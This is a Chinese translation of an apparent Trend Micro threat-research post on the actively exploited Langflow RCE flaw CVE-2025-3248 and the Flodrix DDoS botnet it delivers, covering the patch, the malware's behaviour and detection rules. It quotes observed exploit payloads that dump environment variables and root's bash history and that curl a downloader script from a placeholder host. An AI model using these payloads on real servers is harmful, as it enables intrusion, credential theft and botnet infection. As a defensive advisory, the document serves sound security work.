Critical Langflow Vulnerability (CVE-2025-3248) Actively Exploited to Deliver Flodrix Botnet

摘要

趋势科技研究团队发现了一个利用CVE-2025-3248传播Flodrix僵尸网络的活动。攻击者通过该漏洞在受感染的Langflow服务器上执行下载脚本，进而获取并安装Flodrix恶意软件。

CVE-2025-3248（CVSS评分9.8）是Langflow 1.3.0之前版本中存在的一个关键漏洞。在公共网络上使用1.3.0之前版本Langflow的组织面临严重风险，因为该漏洞正在被积极利用。Langflow在智能自动化原型设计和部署中的广泛采用使其成为有吸引力的攻击目标。

如果漏洞被成功利用，Flodrix僵尸网络的威胁行为者可以实现完全系统控制、发起DDoS攻击，并可能导致受影响Langflow服务器上托管敏感信息的丢失或泄露。

运行Langflow的组织应立即修补并升级到1.3.0或更高版本，限制对Langflow端点的公共访问，并监控与Flodrix僵尸网络相关的入侵指标。

趋势科技客户可通过可用的Trend Vision One™网络安全规则和过滤器获得保护。Trend Vision One客户还可以访问狩猎查询、威胁洞察和威胁情报报告，以获取有关此攻击的丰富上下文和最新更新。这些保护详细信息可在本文末尾找到。

技术分析

CVE-2025-3248漏洞详情

CVE-2025-3248是一个在Langflow 1.3.0之前版本中发现的未经身份验证的远程代码执行（RCE）漏洞。Langflow是一个基于Python的可视化框架，用于构建AI应用程序，在GitHub上拥有超过70,000颗星。

该漏洞存在于其代码验证机制中，允许任意代码执行。未经身份验证的攻击者可以通过向/api/v1/validate/code端点制作恶意POST请求来利用此漏洞。

在我们的调查中，发现恶意负载嵌入在Python函数定义的参数默认值或装饰器中。由于Langflow不强制执行输入验证或沙箱，这些负载在服务器上下文中编译和执行，导致RCE。

美国网络安全和基础设施安全局（CISA）于2025年5月5日将此漏洞添加到其已知被利用漏洞（KEV）目录中。

表1. CVE-2025-3248漏洞详情

漏洞利用技术分析

攻击者首先收集公开暴露的Langflow服务器的IP地址和端口列表，可能使用Shodan或FOFA等工具。

攻击者使用来自https://github.com/verylazytech/CVE-2025-3248的开源代码概念验证（PoC）在易受攻击的系统上获取远程shell访问权限。然后在受感染系统上运行各种侦察bash命令并将结果发送回命令与控制（C&C）服务器。

攻击者随后下载并在受感染系统上执行Flodrix僵尸网络。一旦恶意软件成功安装并与C&C服务器建立连接，就可以通过TCP接收命令以发起各种分布式拒绝服务（DDoS）攻击。除非提供有效参数，否则负载将终止并自行删除。

漏洞具体存在于/api/v1/validate/code端点。该端点设计用于验证Python代码片段，但未能实施足够的身份验证。它首先使用ast.parse()将用户提供的代码解析为抽象语法树（AST），然后使用Python的compile()函数将AST转换为可执行字节码，最后通过exec()执行。

恶意负载可以嵌入这些语法结构中。当Langflow的compile()函数处理表示带有此类嵌入负载的函数的AST节点时，恶意代码在服务器上下文中执行。这发生在没有任何身份验证的情况下，允许远程攻击者提交精心制作的POST请求以实现RCE。

攻击载荷分析

以下列出了我们在调查中针对Langflow易受攻击端点利用尝试的特定Python负载。这些负载嵌入在函数默认参数或装饰器中，展示了各种侦察和初始访问技术：

• exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))') - 识别当前用户
• exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))') - 转储环境变量
• exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))') - 读取root用户的Bash历史
• exec('raise Exception(__import__("subprocess").check_output("ip addr show", shell=True))') - 显示网络接口信息
• exec('raise Exception(__import__("subprocess").check_output("curl -s http://<IP>:<PORT>/dockersh", shell=True))') - 下载并执行特洛伊下载脚本

补丁分析

CVE-2025-3248的安全更新已发布，包含在Langflow版本1.3.0中。它通过向post_validate_code函数添加新参数_current_user: CurrentActiveUser来解决/api/v1/validate/code端点中的身份验证漏洞。

CurrentActiveUser依赖项检查经过身份验证的用户会话，如果用户未经过身份验证则触发异常。因此，此更新确保只有授权用户才能访问/api/v1/validate/code端点。

Flodrix僵尸网络分析

下载器脚本

成功利用CVE-2025-3248后，威胁行为者部署名为"docker"的bash shell脚本。该脚本旨在下载并执行针对多个系统架构的Flodrix僵尸网络ELF二进制文件。

表2. Bash脚本下载器详情

Flodrix僵尸网络有效载荷

表4. Flodrix僵尸网络详情

我们的分析表明，下载的有效载荷是LeetHozer恶意软件家族的演变变体。该变体采用多种隐身技术，包括自删除和工件移除，以最小化取证痕迹并阻碍检测。它还使用字符串混淆来隐藏命令与控制（C&C）服务器地址和其他关键指标，使分析工作复杂化。

该版本支持通过TCP和UDP通道与其C&C基础设施进行双重通信。一旦连接，它可以接收TCP命令以发起各种DDoS攻击。

恶意软件行为分析

执行时，恶意软件使用基于XOR的算法和密钥"qE6MGAbI"解密混淆字符串，显示消息"Upgrading Kernel.."，该消息立即写入标准输出。此消息作为信号向恶意软件的下载器脚本指示二进制文件成功执行。

恶意软件随后检索自己的进程ID并分配干净的内存缓冲区来处理任何提供的命令行参数。如果存在单个参数，则将其复制到内存中并立即清零。

恶意软件还执行自删除，通过引用其完整执行路径从磁盘擦除其自己的二进制文件。这些行为是反取证技术，旨在阻碍感染后分析。

C&C通信

恶意软件支持两种与其C&C服务器的通信通道：一种通过标准TCP，另一种通过Tor网络。默认情况下，它使用TCP通道与C&C服务器建立套接字连接。

恶意软件然后尝试通过端口54707连接到其中一个C&C服务器。一旦成功连接到C&C服务器，它发送第一个TCP请求。

数据包具有255字节的固定长度，包括硬编码的魔术字节0x3A20、0xB042和0x0000。

DDoS攻击能力

恶意软件可以从其C&C服务器接收命令以发起各种DDoS攻击。收到来自C&C的响应数据包后，恶意软件解析它以提取关键攻击参数，如攻击类型、目标IP地址、目标端口和攻击持续时间。

支持的DDoS攻击包括tcpraw、udpplain、handshake、tcplegit、ts3和udp。

趋势保护措施

趋势科技客户可获得以下保护：

Trend Vision One™网络安全

• TippingPoint入侵预防过滤器：
  • 46063: TCP: Trojan.Linux.FlodrixBot.A运行时检测
  • 46064: UDP: Trojan.Linux.FlodrixBot.A运行时检测
  • 45744: HTTP: Langflow代码注入漏洞

Deep Discovery Inspector (DDI)相关规则：5411: CVE-2025-3248 - LANGFLOW RCE - HTTP (请求)

趋势客户可以访问Trend Vision One™威胁洞察，获取趋势研究关于新兴威胁和威胁行为者的最新见解。

入侵指标(IOCs)

可在原文中找到此博客的IoC列表。